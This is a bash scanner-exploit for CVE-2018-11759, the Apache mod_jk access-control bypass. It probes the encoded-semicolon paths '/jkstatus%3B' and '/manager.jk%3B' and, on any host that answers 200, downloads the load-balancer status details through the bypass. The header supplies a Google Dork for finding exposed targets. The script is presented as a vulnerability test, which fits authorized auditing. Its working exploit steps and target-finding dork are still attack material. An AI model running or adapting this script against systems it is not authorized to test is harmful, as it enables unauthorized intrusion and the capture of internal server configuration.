#!/bin/bash
# CVE 2018-11759
# Author: Julio Lira <[email protected]>
# Colaborator: Fernando Eloi <[email protected]>
# date: 12/07/2018 | MM/DD/YYYY
# License: GNU GPL version 3
# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
# Description: This script tests whether an application is vulnerable to CVE-2018-11759.
# Google Dork: ["JK Status Manager for"]
# Vendor Homepage: [http://tomcat.apache.org/]
# Exploit Link: [https://github.com/Jul10l1r4/Identificador-CVE-2018-11759]
# Version: [0.1]
# Tested on: [Slackware, Debian, Redhat, is compatible for all unix-like including Mac OS and others]
# Dependencies: curl, which
# CVE : [CVE-2018-11759]
# Case-insensitive matching for [[ ]] and case patterns from here on.
shopt -s nocasematch
# Banner, printed in green; the colour is not reset after the banner.
printf '\033[32m'
cat <<'EOF'
____ _____ ______ ___ _ ___ _ _ _____ ____ _____
/ ___|| ___/ |___ \ / _ \/ |( _ ) / / |___ | ___|/ _ \ \
\___ \| |_ | | __) | | | | |/ _ \ _____| | | / /|___ | (_) | |
___) | _< < / __/| |_| | | (_) |_____| | | / / ___) \__, | > >
|____/|_| | ||_____|\___/|_|\___/ |_|_|/_/ |____/ /_/| |
\_\ /_/
By Segment Fault.
EOF
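#######################################
# Download the status details of a flagged endpoint into files_cap/.
# Arguments: $1 - URL that answered 200 in the probe (as passed by the caller)
# Outputs:   progress messages on stdout, failures on stderr;
#            writes files_cap/<host>.data
# Returns:   0 when the capture was saved, 1 when curl is missing, the
#            directory cannot be created or the download fails
#######################################
_save() {
  local host out

  # Stop early when curl is absent instead of writing an empty capture.
  if ! command -v curl > /dev/null 2>&1; then
    printf '\n \033[31mInstall the Curl\033[0m\n'
    return 1
  fi
  printf '\n Curl found \n'

  # The file name is the third "/"-separated field of the URL (the host part).
  # It comes from operator input, so every use below is quoted.
  host=$(printf '%s\n' "$1" | cut -d "/" -f 3)
  out="files_cap/${host}.data"

  echo -e '\033[32m Benning to download of details for load-balancer\033[0m'
  mkdir -p -- files_cap || return 1

  # The capture holds load-balancer details of the tested host, so create it
  # readable by the owner only. Download to a .part file first so a failed
  # transfer never replaces an earlier capture.
  if ! (umask 077 && curl "$1/jkstatus;?mime=prop" > "${out}.part"); then
    rm -f -- "${out}.part"
    printf '\n \033[31mDownload failed, nothing saved\033[0m\n' >&2
    return 1
  fi
  mv -f -- "${out}.part" "$out" || return 1

  # Report success only after the file is in place.
  echo -e "\n \033[32mDetails has been saved in ${out}\033[0m"
}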
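#######################################
# Probe the two status-manager paths of a host with HEAD requests.
# Globals:   url (written)      - probed URL that did not answer 404, or ""
#            response (written) - HTTP code for that URL, 404 when both
#                                 paths answered 404
# Arguments: $1 - base URL including the scheme
# Outputs:   one "Response: ..." line per probed path on stdout
#######################################
_req() {
  local base=$1
  local jks mjk

  # Reset the globals on every call: the caller runs this in a loop, and a
  # host where both paths answer 404 must not inherit the previous verdict.
  url=""
  response=404

  # curl runs in the foreground so the substitution captures the status code
  # deterministically; --silent already keeps it quiet.
  jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "${base}/jkstatus%3B")
  echo "Response: $jks on /jkstatus"
  mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "${base}/manager.jk%3B")
  echo "Response: $mjk on /manager.jk"

  # Quoted operands: an empty code (curl missing) must not break the test.
  if [ "$mjk" != 404 ]; then
    url="${base}/manager.jk%3B"
    response=$mjk
  elif [ "$jks" != 404 ]; then
    url="${base}/jkstatus%3B"
    response=$jks
  fi
}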
# --help: print a short pointer to the README and the project page.
# The script continues with the interactive prompt afterwards.
if [ "$1" = "--help" ]; then
  printf '%b\n' "
\033[32mOpen the main and follow the way
For more details read the README.md or
access https://github.com/Jul10l1r4/Identificador-CVE-2018-11759\033[0m"
fi
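# Interactive loop: read one target per line until EOF, probe it with _req
# and print a verdict derived from the HTTP status code it reports.
while read -r -p "Paste the URL -> " LINE; do
  # Nothing to probe on an empty line.
  [[ -n "$LINE" ]] || continue

  # Require a complete scheme; matching only "^http" would also accept host
  # names that merely begin with "http".
  if [[ "$LINE" =~ ^https?:// ]]; then
    echo "Format ok"
  else
    printf "The host use SSL? (y/n)→ "
    use=""
    read -r use
    # [[ ]] honours the nocasematch option set at the top of the script,
    # so "Y" is accepted as well.
    if [[ "$use" == "y" ]]; then
      LINE="https://$LINE"
    else
      LINE="http://$LINE"
    fi
    export LINE
  fi

  # Clear the result globals so a target never inherits the previous verdict.
  url=""
  response=404
  _req "$LINE"

  case "$response" in
    200)
      echo -e "\n \033[31m[Vul]\033[0m\n See: $url"
      _save "$url"
      ;;
    302 | 401)
      echo -e "\n Safe, but can suffer attack\n brute-force, caution\n See: $url"
      ;;
    000 | "")
      # curl reports 000 when no HTTP response arrived; an unreachable host
      # must not be reported as safe.
      printf '\n \033[33mNo HTTP response from %s, result inconclusive\033[0m\n' "$LINE" >&2
      ;;
    *)
      printf "\n \033[032mSafe, conglats!\033[0m\n"
      ;;
  esac
done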